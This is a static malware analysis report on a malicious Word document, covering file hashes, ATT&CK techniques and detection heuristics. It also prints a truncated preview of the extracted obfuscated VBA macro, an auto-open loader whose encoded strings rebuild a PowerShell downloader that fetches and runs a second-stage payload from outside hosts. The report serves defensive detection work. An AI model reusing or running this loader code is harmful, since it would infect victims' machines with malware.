Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d7cc40563239fef6…

MALICIOUS

Office (OLE)

129.5 KB Created: 2018-02-14 17:21:00 Authoring application: Microsoft Office Word First seen: 2018-02-19
MD5: 510687f974d2125e7ddff34fa778e2dc SHA-1: ef7ea1ced00479bf55e9c5a409697bd1042070d2 SHA-256: d7cc40563239fef6da1810664aff07d8ac41c0583977bade85b8cf7d61fd490b
302 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1140 Deobfuscate or Obfuscate Malicious Code

The sample is a malicious Office document containing obfuscated VBA macros. Critical heuristics indicate the presence of an auto-executing loader that uses Shell() calls and custom decoding. The primary function of the script appears to be downloading and executing a second-stage payload from a URL that is partially reconstructed from concatenated strings.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6448733-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6448733-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 23928 bytes
SHA-256: d16c95d66b098c687837c632d774dce5dafbe87981588802f1b99c58c2fb7218
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "aiNiCfrApT"
Function NilCSnTOVHMwK()
On Error Resume Next
owdYRmm = (wrkjm - Int(uutrvYwRWwBJLZ) * zfFBMWMIi / Oct(pOhULG) - (wkSafsUrDT - Sin(9032657)))
OLIWFUI = (HKnsiw - Int(ffZZhlL) * FJRwKrYKaGw / Oct(mkJJCRCa) - (BVCYzbwYLkoUKO - Sin(6457550)))
wnQSWfVuRuo = (XkOjzMlhbYuV - Int(XQjkjDoO) * LQamPVIAc / Oct(cYfhorzpj) - (wajcInUFj - Sin(5179867)))
wYquM = (PBkREJTwR) + HJjkJKD("IKKZnKoWNf8+Nf8RENf8+Nf8xBR6uK8+uK8'+'/?htNf8+Nf8tp:/pv2+pv2/Nf8+Nf8www.socNf8+Nf8iNf8zItPZjLPXYjFBkEptRmqbOwkYwiYsi", 9, 78)
uzcNl = (bkjzdbBDQBLiB - Int(IqhlsUwViIj) * vmKqqwpd / Oct(oOMkVOVKu) - (LqLaELz - Sin(4323733)))
ZRVrm = (zFGaOMfPtaK - Int(tXIUbVB) * FaLjwYakL / Oct(frZFjS) - (owXpzckkwRT - Sin(546714)))
cqupBTwPKPh = (cpwziX - Int(XipmvDnuTpnrq) * nXdhGzbzzGHh / Oct(cptZaJ) - (KJIltwppQ - Sin(1363550)))
GXzvXnoiN = (PZawYtrrivtkOE) + HJjkJKD("zKNLAce(Nf8JskNf8,[sTrIng][cHaR]39)) pv2)uK8+uK8.rePlacE(pv2Nf8pv2,[sTRInG][CHar]39).rePlacE(([CHar]116+[CHaruK8+uK8]uK8+uK854+[CHar]113)'+',[sTRInG][CHaSHZlQPzz", 4, 150)
Vuhbw = (SbdPrnJHlis - Int(fVmnYYHCjF) * fYGfzdkqrRtt / Oct(LCdfOSjomHztK) - (jBIKzMowq - Sin(7033970)))
RjIuzkUoNb = (KiBsBK - Int(bvbVvcnQZwtR) * moFDoi / Oct(uhDNLs) - (DofwkzNRP - Sin(9317622)))
ijiLnqsp = (GjWimpF - Int(cVWYzESDq) * rOKCFkcuCITuU / Oct(JshCkMuNH) - (PBhPhrSuWYXh - Sin(201825)))
hKnzOp = (ijiOzLEaQM) + HJjkJKD("LbcHaR]54),[sTrIng][cHaAcvBHtAXZVwvHrPRPF", 3, 21)
ZKTUL = (DCNNKqZXwCbr - Int(bzHCZKjhAl) * cUBbs / Oct(tadRXksfd) - (fLEtnN - Sin(8810826)))
NoHHGbAJM = (VWwDwrFDQMkqo - Int(iXIAOLDNPXwDAV) * rNPaLGWcpilLUT / Oct(umShhhlmwhl) - (HZHtqk - Sin(1430390)))
Ekpld = (zUPdsHvSW - Int(AjujcKlTnO) * aQsZwP / Oct(ilvbM) - (jZWooZlSQVhCN - Sin(4461011)))
Gmworjn = (FiBwOEXQSdzdHX) + HJjkJKD("VJ+uK8f8+Nf8Jsk+JNf8+NfuK8+u'+'K88skeJskpv2+uK8+u'+'K8pv2+Nf8+NuK8+uK8f8Jpv2+uzHRmZsBsVn", 3, 76)
QBBTJCl = (vKXlsFl - Int(YfTbHVzluh) * jioJfNTvJLriQ / Oct(NIMjIAnzII) - (DYvjnKkjjEjGB - Sin(8429597)))
crocEE = (YJbRhwDwu - Int(nFmhFlW) * PcpYOWAGBja / Oct(CLolbdVqbwz) - (BTAFwzdTJb - Sin(7218485)))
JozEbIlOX = (iAvFRav - Int(WMLbQBFbP) * ETcNWvWuICC / Oct(YaZYDb) - (QZABcFpIYpz - Sin(8735314)))
CWsKABHjjP = (hYWzDCnwfOcn) + HJjkJKD("PqKlmExNf8+Nf8wnNf'+'8+Nf8sNf8+Nf8adasdNfpv2+pv28+uK8+uK8'+'Nf8 '+'= &(Jspv2+pv2Nf8+Nf8knNuK8JXullN", 7, 87)
qsYDBsLj = (rzisw - Int(DRAIhn) * FLJADuDHmiwjhC / Oct(IHpBXVzzPJE) - (TAlLvLlQG - Sin(6835758)))
iHOKQSs = (MtjvFPfJ - Int(EUIsTjPc) * MtqwXj / Oct(AXDXwl) - (ZncIraskjA - Sin(7562250)))
BjihzEAtdml = (zrtrPwII - Int(pdOVwoErclVSs) * EqXXBPbKqKF / Oct(PHfnbndhjKOn) - (mnsHOSAHIoBrYH - Sin(8690341)))
CEWQcd = (dzjWRsUPnk) + HJjkJKD("VimbuzjTEwDf8uK8+uK8+Nf8u/XEZ8sF/JskNfpv2+pv28+Nf8.SplNpv2'+'+pv2f'+'8+Nf8it(JsuK8+uK8k?JsuK8+uK8k)Nf8+Nf8;3Nf8+Nf8xw'+'SDC =Nf8+NfuK8+uK88 3xwNf8+Npv2+pv'+'2f8env'zjBAjB", 12, 153)
FXrJGJCSUzk = (sEdGSivDfj - Int(DYLXjNq) * SEkLzIuZHvs / Oct(jdJKKiSi) - (sHBFvwUQMtB - Sin(7167638)))
BRhufLAkEqt = (kYHtf - Int(YFoHnSfaPAMAuM) * ZzjGBMZIvBrjht / Oct(CRCTGcEzOmQV) - (QztGZD - Sin(1967634)))
VKuqOL = (YnimwwsFvm - Int(hdzvzbGWVzUTlq) * rvIkHdiJ / Oct(iYjHfLtSAS) - (bSDvfSjpdDTs - Sin(9243709)))
idTJuBHS = (KhpKztckcObjC) + HJjkJKD("mnKlazmf8+Nf8suK8+uK8kpv2+pv2-Nf8+Nf8objNf8+Nf8ectJ'+'sk)Nf8+pv2+pvuK8+uK82Nf8 SNf8+Nf8pv2+pv2ystem.Net.N'+'uK8+uK8f8+Nf8wTKlkqajJtjKidCpZmXIXE", 8, 114)
MNbuzAM = (sMFoztjaK - Int(kdaPvHUwoHz) * XkUpfZBzYtmj / Oct(kFrWF) - (sHsJVRuIvzVO - Sin(6949187)))
lOvii = (GpVTINGZL - Int(rqtKLB) * bjUGifawYl / Oct(GADiCGwv) - (XOrhTvkSiXjz - Sin(8751392)))
zziwa = (tiQSbJuUk - Int(pSKEMomMPR) * Nrmmiu / Oct(TACTMi) - (zmnWlq - Sin(501135)))
JZipY = (uwrJECTTCs) + HJjkJKD("LzjFRrra.com/1RurEqNf8+Nf8F/Nf8+Nf8?httuK8+'+'uK8p://mNf8+Nf8cfNf8+Nf821.ruK8+uK8uNuK8+uK8f8+Npv2+pv2f8pv2+pv2/LaZEJ", 7, 106)
Jmqt
... (truncated)